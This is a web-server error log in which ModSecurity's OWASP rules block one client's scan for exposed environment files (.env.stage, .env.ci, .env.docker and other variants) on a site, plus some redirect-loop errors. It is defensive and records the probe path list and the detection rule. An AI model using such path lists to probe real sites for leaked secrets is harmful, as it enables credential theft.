[Mon May 11 14:09:50.967655 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.stage"] [unique_id "agHHDlchVQ3tCn0m9OpAlAAAAQ4"]
[Mon May 11 14:09:50.967903 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.stage"] [unique_id "agHHDlchVQ3tCn0m9OpAlAAAAQ4"]
[Mon May 11 14:09:51.196148 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.ci"] [unique_id "agHHD1chVQ3tCn0m9OpAlgAAAQ4"]
[Mon May 11 14:09:51.196564 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.ci"] [unique_id "agHHD1chVQ3tCn0m9OpAlgAAAQ4"]
[Mon May 11 14:09:51.196742 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.ci"] [unique_id "agHHD1chVQ3tCn0m9OpAlgAAAQ4"]
[Mon May 11 14:09:51.196990 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.ci"] [unique_id "agHHD1chVQ3tCn0m9OpAlgAAAQ4"]
[Mon May 11 14:09:51.252293 2026] [core:error] [pid 1319953:tid 1319958] [client 52.242.216.199:59595] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:51.252330 2026] [core:error] [pid 1319953:tid 1319958] [client 52.242.216.199:59595] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:51.369132 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.docker"] [unique_id "agHHD1chVQ3tCn0m9OpAlwAAAQ4"]
[Mon May 11 14:09:51.369526 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.docker"] [unique_id "agHHD1chVQ3tCn0m9OpAlwAAAQ4"]
[Mon May 11 14:09:51.369720 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.docker"] [unique_id "agHHD1chVQ3tCn0m9OpAlwAAAQ4"]
[Mon May 11 14:09:51.369968 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.docker"] [unique_id "agHHD1chVQ3tCn0m9OpAlwAAAQ4"]
[Mon May 11 14:09:51.611601 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.live"] [unique_id "agHHD1chVQ3tCn0m9OpAmQAAAQ4"]
[Mon May 11 14:09:51.611975 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.live"] [unique_id "agHHD1chVQ3tCn0m9OpAmQAAAQ4"]
[Mon May 11 14:09:51.612168 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.live"] [unique_id "agHHD1chVQ3tCn0m9OpAmQAAAQ4"]
[Mon May 11 14:09:51.612414 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.live"] [unique_id "agHHD1chVQ3tCn0m9OpAmQAAAQ4"]
[Mon May 11 14:09:51.775703 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.preprod"] [unique_id "agHHD1chVQ3tCn0m9OpAmwAAAQ4"]
[Mon May 11 14:09:51.776098 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.preprod"] [unique_id "agHHD1chVQ3tCn0m9OpAmwAAAQ4"]
[Mon May 11 14:09:51.776297 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.preprod"] [unique_id "agHHD1chVQ3tCn0m9OpAmwAAAQ4"]
[Mon May 11 14:09:51.776546 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.preprod"] [unique_id "agHHD1chVQ3tCn0m9OpAmwAAAQ4"]
[Mon May 11 14:09:51.859174 2026] [core:error] [pid 1319886:tid 1319914] [client 52.242.216.199:21701] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:51.859379 2026] [core:error] [pid 1319886:tid 1319914] [client 52.242.216.199:21701] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:51.950203 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.uat"] [unique_id "agHHD1chVQ3tCn0m9OpAnAAAAQ4"]
[Mon May 11 14:09:51.950596 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.uat"] [unique_id "agHHD1chVQ3tCn0m9OpAnAAAAQ4"]
[Mon May 11 14:09:51.950779 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.uat"] [unique_id "agHHD1chVQ3tCn0m9OpAnAAAAQ4"]
[Mon May 11 14:09:51.951031 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.uat"] [unique_id "agHHD1chVQ3tCn0m9OpAnAAAAQ4"]
[Mon May 11 14:09:52.144540 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.dist"] [unique_id "agHHEFchVQ3tCn0m9OpAngAAAQ4"]
[Mon May 11 14:09:52.144927 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.dist"] [unique_id "agHHEFchVQ3tCn0m9OpAngAAAQ4"]
[Mon May 11 14:09:52.145136 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.dist"] [unique_id "agHHEFchVQ3tCn0m9OpAngAAAQ4"]
[Mon May 11 14:09:52.145404 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.dist"] [unique_id "agHHEFchVQ3tCn0m9OpAngAAAQ4"]
[Mon May 11 14:09:52.398417 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.swp"] [unique_id "agHHEFchVQ3tCn0m9OpAoAAAAQ4"]
[Mon May 11 14:09:52.398807 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.swp"] [unique_id "agHHEFchVQ3tCn0m9OpAoAAAAQ4"]
[Mon May 11 14:09:52.398991 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.swp"] [unique_id "agHHEFchVQ3tCn0m9OpAoAAAAQ4"]
[Mon May 11 14:09:52.399270 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.swp"] [unique_id "agHHEFchVQ3tCn0m9OpAoAAAAQ4"]
[Mon May 11 14:09:52.646235 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env~"] [unique_id "agHHEFchVQ3tCn0m9OpAogAAAQ4"]
[Mon May 11 14:09:52.646656 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env~"] [unique_id "agHHEFchVQ3tCn0m9OpAogAAAQ4"]
[Mon May 11 14:09:52.646843 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env~"] [unique_id "agHHEFchVQ3tCn0m9OpAogAAAQ4"]
[Mon May 11 14:09:52.647081 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env~"] [unique_id "agHHEFchVQ3tCn0m9OpAogAAAQ4"]
[Mon May 11 14:09:52.880133 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env1"] [unique_id "agHHEFchVQ3tCn0m9OpAowAAAQ4"]
